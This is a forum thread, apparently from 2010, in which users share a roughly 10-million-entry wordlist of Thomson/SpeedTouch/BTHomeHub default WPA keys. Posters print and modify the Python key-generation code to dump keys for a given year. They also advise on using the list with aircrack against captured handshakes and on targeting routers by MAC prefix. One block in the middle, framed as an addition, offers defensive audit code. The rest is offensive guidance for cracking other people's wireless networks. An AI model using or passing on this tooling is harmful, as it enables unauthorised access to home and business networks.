Here is the wordlist I generated with wifipassreminder. There are two mirrors; let me know in PM if they die.
The uncompressed version is about ~104MB, containing almost 10.000.000 keys
Mirror #1 (Swedish host)
Mirror #2
Thanks to the person behind wifipassreminder and also Liuser for helping me format the list!
Thanx for this. Is this wordlist with keys only for 2010?
EDIT: After analysing the source code of wifipassreminder, I noticed it would only calculate passwords until 2009. The code is as follows:
Code:
```python
import hashlib, os  # needed by the excerpt (Python 2)

def dict(self):
    year = 6
    week = 1
    ii = 1
    f = open(os.path.dirname(__file__)+'/dic.lst', 'r')
    x = open(os.path.dirname(__file__)+'/file.lst', 'a+')
    while (ii <= 46656):  # one pass per line of dic.lst
        dict=f.readline().replace('\n','')
        dicthex=str.upper(dict.encode("hex"))
        while (week <= 52):
            # semana = week, zero-padded to two digits
            if week >= 10:
                semana = str(week)
            if week < 10:
                semana = "0" + str(week)
            while (year <= 9):  # years 06 to 09
                yy="0" + str(year)
                nome = "CP"+yy+semana+dicthex  # nome = name fed to SHA-1
                hash = str.upper(hashlib.sha1(nome).hexdigest())
                password = hash[:10]
                ssid = hash[-6:]
                x.write(ssid+"|"+password+"\n")
                year = year + 1
            week = week + 1
            year=6
        week=1
        ii = ii + 1
```
According to this, it will calculate passwords from 2006 until 2009. The code should be easy to alter to make it dump 2010 only passwords. I'll keep posting.
Ok, I changed the code like this (the red parts are the ones I removed/edited):
Code:
```python
import hashlib, os  # needed by the excerpt (Python 2)

def dict(self):
    year = 10  # was: year = 6
    week = 1
    ii = 1
    f = open(os.path.dirname(__file__)+'/dic.lst', 'r')
    x = open(os.path.dirname(__file__)+'/file.lst', 'a+')
    while (ii <= 46656):  # one pass per line of dic.lst
        dict=f.readline().replace('\n','')
        dicthex=str.upper(dict.encode("hex"))
        while (week <= 52):
            if week >= 10:
                semana = str(week)
            if week < 10:
                semana = "0" + str(week)
            while (year <= 10):  # was: year <= 9
                yy=str(year)  # was: "0" + str(year)
                nome = "CP"+yy+semana+dicthex
                hash = str.upper(hashlib.sha1(nome).hexdigest())
                password = hash[:10]
                # the ssid line of the original was removed here
                x.write(password+"\n")  # was: ssid+"|"+password+"\n"
                year = year + 1
            week = week + 1
            year=10  # was: year=6
        week=1
        ii = ii + 1
```
After running the application, it dumped a 27.7Mb file, which I hope only contains 2010 keys. If anyone detects some flaw in the changes I made, feel free to talk!
Last edited by Snayler; 10-16-2010 at 06:53 AM.
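Seen from the owner's side, the derivation in the two listings above can be used to audit routers you administer: recompute the factory values from the fields on the label and compare them with the live configuration. This is an added example in Python 3, not code from the post or from wifipassreminder; it assumes dic.lst holds the three-character codes over 0-9A-Z (36^3 = 46656), and the device names, SSIDs and inventory records are constructed.

```python
import hashlib

ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"  # assumed dic.lst alphabet: 36**3 = 46656 codes

def derive_defaults(year, week, unit):
    """Recompute (ssid_suffix, default_key) as the posted loop does for one unit."""
    if not (0 <= year <= 99 and 1 <= week <= 52):
        raise ValueError("year must be 0-99 and week 1-52")
    if len(unit) != 3 or any(c not in ALPHABET for c in unit):
        raise ValueError("unit code must be 3 characters from 0-9A-Z")
    name = "CP%02d%02d%s" % (year, week, unit.encode("ascii").hex().upper())
    digest = hashlib.sha1(name.encode("ascii")).hexdigest().upper()
    return digest[-6:], digest[:10]

def keyspace(years):
    """Number of candidate default keys for the given manufacturing years."""
    return len(ALPHABET) ** 3 * 52 * len(years)

def audit(device):
    """Return findings for one inventory record (label fields plus live config)."""
    suffix, default_key = derive_defaults(device["year"], device["week"], device["unit"])
    findings = []
    if device["psk"].upper() == default_key:
        findings.append("PSK is the factory default")
    if device["ssid"].upper().endswith(suffix):
        findings.append("SSID still carries the factory suffix")
    return findings

def sample_inventory():
    """Constructed records: one router left on defaults, one reconfigured."""
    suffix, key = derive_defaults(9, 23, "A7K")
    return [
        {"name": "lobby-ap", "year": 9, "week": 23, "unit": "A7K",
         "ssid": "Thomson" + suffix, "psk": key},
        {"name": "office-ap", "year": 10, "week": 2, "unit": "Z01",
         "ssid": "office-net", "psk": "correct horse battery staple 41"},
    ]

if __name__ == "__main__":
    for dev in sample_inventory():
        print(dev["name"], audit(dev) or "ok")
    print("2006-2009 candidates:", keyspace(range(6, 10)))
    print("2010 candidates:", keyspace([10]))
```

Under the stated assumption, the 2006-2009 loop yields 9,704,448 candidates and the 2010-only loop 2,426,112, so any router flagged by `audit` should get a new passphrase.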
Snayler, once again your help has been a blessing to this total Linux noob.. (snif..)
I'm glad to know this idea is being useful to more people than me.
Have you checked with the app developer if your correction is ok? Also, are u sure jonathan's wordlist is from 2004 to 2010? After reading what u said, it seems the wordlist is only 2004-2009.. unless he also changed the app.. Right?
Can u post a torrent/hxxp from the file created?
I'm currently having another issue in my BT partition, and tonight I need to work on expanding the partition.. I just hope I don't ruin anything.. Wish me luck!
Once again, thanx for all the help!
Cheers!
Hi all,
I have used stkeys in the past from GNU citizen, and it creates a file with all possible keys for the SSID (about 80 or so) by reverse engineering the algorithm found to be used by Thomson. When I used it to check a BTHomeHub I already knew the key, so I just searched the file and it was there, but this only worked on BTHomeHub, not the BTHomeHub2, so I guess this is working for the more recent versions. Is there any tutorial on this script? It looks very interesting. stkeys was very good and still is on some old versions. I think what it did was calculate the possible keys and then auto tried to connect using the keys generated until the correct one was used. Correct me if I'm wrong. This new tool could be great on BackTrack, as at present it seems a bit hit and miss with creating your own tables from a dictionary, i.e. cowpatty etc.
Keep up the good work, this could be a very long thread.
Regards Dee
Last edited by pentest09; 10-15-2010 at 09:18 PM.
Dee,
For BTHomeHub tool, just google BTHHKeygen and download Adrian Pastor files.. This situation is a bit similar, but instead of 80 keys, you have all, to attack any Thomson/SpeedTouch/BTHH, either the new ones from 2010 (SSID is no longer from the hash1, but last 6 digits from MAC) or ANY router with a changed SSID, but with default key still used.. This is easy to check, u just grab the first 6 digits from MAC and check HERE if it's a Thomson/ST router.. If the key is still default, this will reduce your attack time drastically!
Glad to see more and more people joining in!
Cheers!
Last edited by skor78; 10-15-2010 at 10:14 PM.
Doesn't this tool only work for WEP keys? Before we get too much into the BTHomeHub tools stuff and thread closed as not due to BackTrack tools, I would like to know if your wifi reminder works on BT, and is there a tut on this tool, as it would be great to keep BackTrack as dist of choice for all attacks.
Please advise and thanks for reply.
Dee,
For WEP all this is useless.. I don't need extra tools for something that's already done in 2min...
"For BTHomeHub tool (WPA!!), just google BTHHKeygen and download Adrian Pastor files.." (Default WEP Keys don't mean default WEP encryption, just read GNU Citizen again)
For Thomson/ST/BTHH (changed SSID) use this dictionary..
wifipassreminder is not ours.. google it and you'll find the project home page. Yes, it's Linux supported, and no, there's no need for a tut., it's pretty straightforward, and once you use it, you'll have all your doubts answered.
Cheers.
I don't need to know WEP cracking, aircrack's the tool of choice on that, that's fine. Got the hang of wifipassreminder: outputs a lst file with keys. Can these be used as dict attack with aircrack for WPA with the handshake capture?
Regards.